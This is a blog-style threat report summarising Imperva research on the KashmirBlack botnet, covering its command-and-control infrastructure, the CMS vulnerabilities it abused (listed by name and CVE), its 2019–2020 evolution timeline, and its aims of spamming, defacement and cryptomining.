KashmirBlack Botnet Attacked Popular CMSs Like WordPress & Joomla
KashmirBlack Botnet Mainly Infects Sites Running on CMSs Such As WordPress
In this digital age, several websites get attacked daily due to data breach, brute force, vulnerabilities, or any other reasons. A variety of attacks occur on different platforms of different types, scope, and volume. And one such is a highly advanced botnet called KashmirBlack that has mainly infected hundreds of thousands of websites by attacking popular CMS (Content Management System) platforms like WordPress, Joomla, and Drupal.
What’s KashmirBlack Botnet?
Botnet means collecting internet-connected devices infected by malware that lets hackers control them. And one such popular botnet is KashmirBlack that mostly targets popular CMS platforms such as WordPress, with the help of numerous vulnerabilities on the victim’s server while performing millions of attacks on a daily basis in more than 30 countries around the globe.
Further, the main reason behind infecting KashmirBlack botnet sites is to use their servers for cryptocurrency mining and redirect legit site traffic towards spam pages.
According to the Imperva researchers, this botnet had started small. Still, after a few months of continuous growth, it turned into a sophisticated behemoth that’s capable of attacking several sites within a single day. Further, some big changes also occurred this May 2020, and KashmirBlack botnet increased its infrastructure into command-and-control (C&C) while exploiting its arsenal.
But before getting into it, let’s first get a proper understanding of Kashmir Botnet.
High-Level Description of KashmirBlack Botnet
KashmirBlack is managed by one of the servers called C&C (Command and Control) and uses more than 60 surrogate servers as part of the infrastructure. It handles several bots. Each of them communicates with the C&C that receives new targets and performs different attacks like brute force attacks, installing backdoors, and expanding this botnet’s size.
Further Analysis of KashmirBlack Botnet Entities
Let’s find out the details regarding KashmirBlack botnet entities, so you can figure out what makes this botnet infrastructure so different and complex compared to others.
The C&C
Put simply, it’s a centralized machine that sends commands and receives telemetries through machines that are part of a botnet. In other words, C&C Server (Command and Control Server) is one of the computers that issue directives for the digital devices that are infected with other types of malware or rootkits like ransomware.
- Supplies Pearl script that helps to infect victim’s server using malicious botnet script
- Receives reports and attack results from bots
- Supply bots that provide instructions to attack
Repository A
It stores the malicious scripts of the botnet that communicates with the C&C.
Repository B
It stores bundles of payloads and exploits.
Spreading Bot
As the name implies, the spreading bot continuously communicates with the C&C and receives instructions to spread the attack further. Lastly, once the attack gets successful, the bot will report it to the C&C regarding the new victim who got converted to a ‘pending bot.’
Pending Bot
It waits till the C&C approaches and then defines the purpose of the botnet.
Here’s When KashmirBlack Botnet Started
According to Imperva research, the KashmirBlack botnet operation started in November 2019, and since then, the botnet has abused 16 different vulnerabilities successfully.
- jQuery file upload vulnerability – CVE-2018-9206
- PHPUnit Remote Code Execution – CVE-2017-9841
- Joomla! remote file upload vulnerability
- Magento Webforms Upload Vulnerability
- Magento Local File Inclusion – CVE-2015-2067
- CMS Plupload Arbitrary File Upload
- Yeager CMS vulnerability – CVE-2015-7571
- Multiple vulnerabilities that include RCE & File Upload for different plugins in different platforms
- Uploadify RCE vulnerability
- WordPress TimThumb RFI Vulnerability – CVE-2011-4106
- vBulletin Widget RCE – CVE-2019-16759
- WordPress install.php RCE
- Webdav file upload vulnerability
- WordPress xmlrpc.php Login Brute-Force attack
- WordPress multiple Themes RCE – Full list
- WordPress multiple Plugins RCE – Full list
Later multiple clues found during Imperva research, which ensures that the KashmirBlack botnet is the work of a hacker called Exect1337, who’s a member of the Indonesian Hecker PhantomGhost.
Evolution Timeline of KashmirBlack Botnet
Here’s below is the evolution timeline of KashmirBlack Botnet according to the above image:
- November 6, 2019 – One of the oldest exploits and payload bundle got uploaded to ‘repository B’
- November 25, 2019 – The oldest indication of the KashmirBlack botnet activity
- January 31, 2020 – Other payload and exploit bundles got uploaded to ‘repository B’
- March 31, 2020 – Cryptominer payload got added into ‘repository B’
- May 1, 2020 – Payload bundle added to ‘repository B’ and defacement exploit got found
- May 5, 2020 – Attacker started visiting the honeypot
- May 5, 2020 – Fake report to the C&C founded with the honeypot details
- May 6, 2020 – Second fake report sent to the C&C with details of honeypot
- May 8, 2020 – Internal change for the botnet’s reporting address
- May 9, 2020 – Second-time attackers visited honeypot
- May 11, 2020 – Payload bundles and exploit got updated
- May 2020 – The hidden repository of KashmirBlack botnet found on Github
- May 15 – 17, 2020 – New repositories were created for the future additions to ‘repository B’
- May 21, 2020 – New repositories were created for the future additions to ‘repository A’
- May 24, 2020 – Multiple usages of new ‘repository B’ started
- May 26, 2020 – Malicious script of KashmirBlack got updated to address ‘repository A load balancer.’
- May 31, 2020 – Research ended
KashmirBlack Used GitHub for Storing Files
The attacker has used GitHub as version control for storing their files. Among them, some were regarding crypto miners and multiple web shells that were used for controlling, uploading, or dumping the entire database of the server that’s attacked.
Purpose of KashmirBlack Botnet
It’s witnessed that KashmirBlack botnet works on five different purposes, and they’re:
- Spamming
- Defacement
- Crypto Mining
- Pending Bot
- Spreading